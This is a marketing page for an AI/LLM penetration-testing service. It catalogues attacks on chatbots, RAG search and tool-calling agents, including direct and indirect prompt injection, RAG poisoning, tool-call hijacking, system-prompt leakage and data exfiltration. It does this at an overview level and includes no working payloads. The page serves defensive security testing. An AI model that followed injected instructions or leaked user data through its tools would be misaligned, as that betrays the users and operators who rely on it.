AI / LLM security assessment

Test the agentbefore it lies for you.

We find what your AI agent will do for an attacker, and prove it. AI pentesters test your chatbot, RAG search, and tool-calling agent by hand. Every weakness arrives with a working exploit, the exact code change to fix it, and a re-test after you patch.

Why now

The window from vulnerability discovery to exploitation has gone from weeks to hours.

Trusted by security teams across Fintech, SaaS & Education, Enterprise & Telecom, Security & Critical Infrastructure

Airbase
Quiltt
Pacvue
Imagine Learning

On record

Same accreditations on every engagement.

CREST is the standard for offensive security execution. CERT-In, SOC 2 Type II, and ISO/IEC 27001 cover how SecureLayer7 handles your prompts, your model artifacts, and your engagement record.

  • APRA CPS 234
    Prudential standard · information security
  • ASD Essential 8
    Australian Signals Directorate maturity model
  • IRAP
    Info-Security Registered Assessors Program
  • CREST accredited
    CREST
    Tester accreditation
  • AICPA SOC 2 Type II
    SOC 2 Type II
    AICPA · TSC controls auditable

Adversarial by hand.

We cross-examine the model the way an attacker would.

Prompt injection doesn't show up in request shape or code paths. It shows up when a document tells your model to email a user's data out, and the model does it. Our AI pentesters run adversarial conversations against your real agent, chatbot, RAG search, and tool-calling, and show you exactly what it gives up.

How we use AI in our pentest engagements
Five-step chain, a SAFE-marked input becomes a doc, then an agent, then a tool, then a leak, showing how a passing scanner result still hands an attacker a data-exfil path through the agent.
Five-step chain, a SAFE-marked input becomes a doc, then an agent, then a tool, then a leak, showing how a passing scanner result still hands an attacker a data-exfil path through the agent.

Pick the engagement

Three ways we test AI. Pick by what you ship.

Every engagement is threat-modelled to your real surface, chat app, agent stack, or model artifact. Bug classes from the OWASP LLM Top 10 are exercised inside the mode that matches what you actually run in production.

01

LLM Application Pentest

Chat UIs, RAG-backed search, AI features inside a SaaS, exercised from scoping to retest. Direct + indirect prompt injection, system-prompt leakage, insecure output handling (XSS via markdown, RCE via eval'd code blocks, SSRF via rendered URLs). Tested against your real prompts and your real RAG corpus.

Chat UI with a malicious payload smuggled into a RAG document; model in the middle; output bubble shows PII leaked in the response.
Agent at the centre with four tool spokes; the send_email spoke is highlighted orange and a travelling dot moves out, illustrating tool-call abuse.
Four-stage training pipeline (data, train, weights, load) with a tampered fine-tune dropping in at the weights stage and the registry-load step highlighted orange.

LLM AGENT ATTACK SURFACE.

Seven attack classes the buyer rarely sees in a scanner readout.

7
  1. 01
    Prompt injection

    Direct user-input attacks that override the agent's system prompt.

  2. 02
    Indirect injection

    Hostile content slipped through RAG documents or tool output.

  3. 03
    RAG-store poisoning

    Tainted vector-store entries that flip the model's grounded facts.

  4. 04
    Tool-call confusion

    Function-call hijacking and parameter tampering on agent actions.

  5. 05
    Identity spoofing

    Agent impersonation across multi-agent or multi-tenant chains.

  6. 06
    Output exfiltration

    Stealing secrets, PII, or schema through carefully shaped responses.

  7. 07
    Plan hijacking

    Multi-step reasoning chains subverted mid-execution by adversarial input.

What we test

Six attack vectors. One engagement.

Every AI/LLM engagement covers the OWASP LLM Top 10 mapped to your real surface, model, prompt, RAG, tools, output, agent, supply chain. Threat-modelled to your application; exercised against named bug classes.

Direct prompt injection (LLM01)
User-supplied input that overrides the system prompt, role-play, refusal-bypass, multi-turn pivots, instruction-stacking, character-encoding tricks. Tested across every entrypoint that reaches the model.
Indirect prompt injection (LLM01)
Adversarial instructions hidden in retrieved documents, tool outputs, web pages, email threads, calendar invites. The agent reads them as instructions and acts on them, the user never sees the prompt.
Insecure output handling (LLM02)
Generated content rendered without sanitisation, XSS via markdown, RCE via downstream eval, SSRF via tool-rendered URLs, prompt-induced response smuggling into auth-protected paths.
Excessive agency / tool abuse (LLM08)
Tool / function-calling exploited to send email, write to databases, execute code, move money. We test the agent's authority limits, scope checks, and human-in-the-loop gates.
Sensitive info disclosure (LLM06)
System-prompt leakage, training-data extraction, model-inversion through targeted queries, embeddings inversion, conversational memory leakage across users / tenants.
Supply chain + model integrity (LLM05)
Compromised model weights, unsafe-pickle deserialisation in PyTorch / safetensors, tampered fine-tunes, hijacked HF / model-registry pulls, malicious adapter / LoRA loading.

AI/LLM METHODOLOGY.

Eight phases. Adversarial.

Threat-modelled to your model choice, system prompt, RAG corpus, and agent topology. Not a template we run against every chatbot.

  1. 01
    Scope & threat-model
  2. 02
    Recon & enumeration
  3. 03
    Direct prompt injection
  4. 04
    Indirect prompt injection
  5. 05
    Output handling abuse
  6. 06
    Tool-call abuse
  7. 07
    Model & data extraction
  8. 08
    Remediation & re-test

AI pentester credentials

Same pentester behind our published CVE research.

Our AI/LLM testing team comes from the offensive-security practice that filed the CVEs in our security advisories. AI surfaces are tested by people who already carry the credentials buyers ask procurement to verify on every web, API, and cloud engagement.

  • Offensive Security Certified Professional
  • Offensive Security Web Expert
  • Offensive Security Experienced Penetration Tester
  • Offensive Security Certified Expert
  • GIAC Penetration Tester
  • GIAC Web Application Penetration Tester
  • GIAC Exploit Researcher and Advanced Penetration Tester
  • Certified Information Systems Security Professional (ISC2)
  • Certified Ethical Hacker (EC-Council)
  • Certified Red Team Operator (Zero-Point Security)
  • Certified Red Team Professional (Altered Security)
  • CREST. Council of Registered Ethical Security Testers

Insights

AI / LLM security Resources.

Prompt-injection chains, tool-use abuse, and the LLM-agent bugs our reviewers publish from real engagements.

Meet our expert

One named lead on every AI/LLM engagement.

John Dill

vCISO at SecureLayer7

15+

Years in offensive security

150+

Engagements led to date

99.99%

On-time engagement delivery

John scopes AI/LLM engagements against your model, system prompt, RAG corpus, and agent topology. He guides the pod from kick-off through final report and re-test.

  • Scopes chat, agent, and RAG engagements against your real risk model.
  • Owns kick-off, mid-engagement check-ins, and live walkthrough of every prompt-injection finding.
  • Drives remediation review and re-test until every agent and tool path is closed.
SL7 Lab. Published CVE research.
John Dill, vCISO at SecureLayer7

Ready to scope an AI/LLM pentest? Book 30 minutes with John to walk through your model, prompts, agents, and timeline.

Book a 30-min call

For startups

Pre-Series A? Apply for the startup program.

A single Autonomous app pentest, CREST-aligned report, engagement-lead signoff, retest included, heavily discounted for pre-Series A startups passing enterprise procurement or SOC 2 due diligence. Eligibility verified on application.

Apply for the startup program

Tested by industry.

The bug classes named below come from real engagements in each sector. Pick the closest fit.

Tech SaaS

Customer-facing copilots, internal agents, cross-tenant retrieval boundaries.

See Tech SaaS pentest

HealthTech

Clinical scribes, patient chatbots, PHI exfil chains, over-prescription manipulation.

See HealthTech pentest

FinTech

KYC copilots, support chatbots, prompt-injection paths through bank tenant data.

See FinTech pentest

Built for Australia engagements

What changes when we deliver here.

  • Regulatory framework

    APP 8 destination ledger per model endpoint

  • Compliance scoping

    APP 11 grading on training + embedding store

  • Local engagements

    AU bank assistant — 9 injection paths closed

  • Local pricing

    AUD per-model fixed-fee, GST itemised

  • Compliance scoping

    ASD / ACSC AI guidance section per finding

Questions Australian AI product teams ask first.

  • Do you cite the ASD voluntary AI guidance?

    Yes. The ASD / ACSC engaging-with-AI and securing-AI guidance is referenced on threat-model findings. Each control gap cites the relevant section.

  • How are APP 8 cross-border issues flagged?

    Every model and vector-store endpoint is logged with destination country. APP 8 disclosure risk is flagged when inference or training data leaves AU.

  • What attack types do you cover?

    Direct + indirect prompt injection, training-data extraction, output handling, model DoS, and supply-chain integrity. OWASP LLM Top 10 IDs are cited per finding.

  • Will the report help a Privacy Impact Assessment?

    Yes. OAIC PIA template fields are pre-filled from the findings. Useful evidence for an APP 11 and NDB-aware AI rollout.

Delivery in Australia

APP 8 + APP 11. ASD ISM AI.

Prompt injection, jailbreak, and data-leak paths are tested. APP 8 cross-border findings list the model host country. APP 11 reasonable steps cover training-data and embedding stores.

Direct line
+61-2-0000-0000
Office
Sydney, Australia

Frameworks scoped: ASD Essential 8 · APRA CPS 234 · Privacy Act · ISO/IEC 27001.

Sample AI/LLM pentest report, kill-chain · evidence · remediation

Sample engagement report

See what arrives in your inbox.

A pre-vetted sample report: full kill chain, working prompt-injection PoCs, code-level fix guidance, and re-test scope. Sent on request after a 5-minute scoping call.